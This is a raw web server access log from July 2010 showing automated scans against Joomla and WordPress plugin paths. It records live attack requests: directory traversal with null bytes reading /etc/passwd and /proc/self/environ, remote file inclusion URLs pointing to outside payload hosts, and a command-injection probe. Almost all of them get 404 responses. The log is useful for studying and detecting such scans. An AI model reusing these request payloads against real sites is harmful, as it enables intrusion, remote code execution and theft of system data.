87.98.217.83 - - [27/Jul/2010:16:40:48 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.208.34.38 - - [27/Jul/2010:16:41:57 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:16:41:57 +0200] "GET /logs/access_log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:16:42:05 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
213.215.178.34 - - [27/Jul/2010:16:42:27 +0200] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [27/Jul/2010:16:42:27 +0200] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.208.34.38 - - [27/Jul/2010:16:44:09 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
213.145.228.170 - - [27/Jul/2010:16:46:42 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 366 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:16:46:42 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 366 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:16:46:42 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 361 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:16:46:43 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 361 "-" "libwww-perl/5.813"
87.98.217.83 - - [27/Jul/2010:16:50:03 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:50:08 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
125.141.91.138 - - [27/Jul/2010:16:51:42 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:51:43 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:16:51:45 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
202.70.136.22 - - [27/Jul/2010:16:52:51 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 366 "-" "libwww-perl/5.805"
202.70.136.22 - - [27/Jul/2010:16:52:52 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 361 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:54:28 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:54:29 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:16:56:26 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:16:56:28 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:56:28 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
67.195.112.178 - - [27/Jul/2010:16:56:31 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [27/Jul/2010:16:56:32 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:56:32 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
67.195.112.178 - - [27/Jul/2010:16:56:32 +0200] "GET /logs/error_log HTTP/1.0" 200 257240 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.47.80.12 - - [27/Jul/2010:16:57:17 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 366 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:16:57:23 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 361 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:16:57:26 +0200] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 366 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:16:57:31 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dokpus.kemenperin.go.id/download/InMen/id.php?i=0qvxtQf6? HTTP/1.1" 404 361 "-" "libwww-perl/5.805"
207.46.13.42 - - [27/Jul/2010:17:04:54 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.42 - - [27/Jul/2010:17:06:02 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.11.39 - - [27/Jul/2010:17:09:34 +0200] "GET /logs/access_log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:09:34 +0200] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:09:34 +0200] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:10:15 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:10:16 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:10:16 +0200] "GET /logs/access_log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:10:47 +0200] "GET /logs/error_log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 353 "-" "Mozilla/5.0"
119.192.145.144 - - [27/Jul/2010:17:11:36 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:17:11:47 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:17:12:04 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
87.98.217.83 - - [27/Jul/2010:17:12:05 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:12:06 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:12:06 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:13:30 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:13:30 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:17:13:31 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
81.208.34.38 - - [27/Jul/2010:17:16:08 +0200] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:16:08 +0200] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:17:16:08 +0200] "GET /logs/access_log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
83.149.110.213 - - [27/Jul/2010:17:16:48 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:16:48 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:17:36 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:17:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:18:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:18:07 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:19:15 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:19:15 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:19:44 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:19:45 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:17:20:22 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
174.121.240.147 - - [27/Jul/2010:17:20:36 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
81.208.34.38 - - [27/Jul/2010:17:20:43 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
92.43.201.28 - - [27/Jul/2010:17:21:19 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:21:19 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:17:21:31 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:21:32 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:21:32 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:17:21:56 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
72.37.150.18 - - [27/Jul/2010:17:22:07 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:22:07 +0200] "GET /logs/access_log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:22:07 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:22:08 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:22:08 +0200] "GET /logs/access_log%20%20//index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:17:22:08 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
174.121.240.147 - - [27/Jul/2010:17:23:19 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:17:23:19 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:17:23:20 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
92.43.201.28 - - [27/Jul/2010:17:23:21 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:22 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:22 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:28 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:31 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:17:23:32 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:17:23:33 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:23:34 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:23:34 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:17:23:48 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
70.38.11.39 - - [27/Jul/2010:17:23:50 +0200] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:23:50 +0200] "GET /logs/access_log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:23:50 +0200] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
92.43.201.28 - - [27/Jul/2010:17:23:58 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
70.38.11.39 - - [27/Jul/2010:17:24:10 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 348 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:24:10 +0200] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 353 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:24:10 +0200] "GET /logs/access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 364 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:24:38 +0200] "GET /logs/error_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 363 "-" "Mozilla/5.0"
70.38.11.39 - - [27/Jul/2010:17:24:56 +0200] "GET /logs/error_log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 353 "-" "Mozilla/5.0"
76.242.100.234 - - [27/Jul/2010:17:25:06 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:26:35 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:26:35 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:27:29 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:17:27:30 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
83.149.110.213 - - [27/Jul/2010:17:27:30 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:27:30 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:17:27:31 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
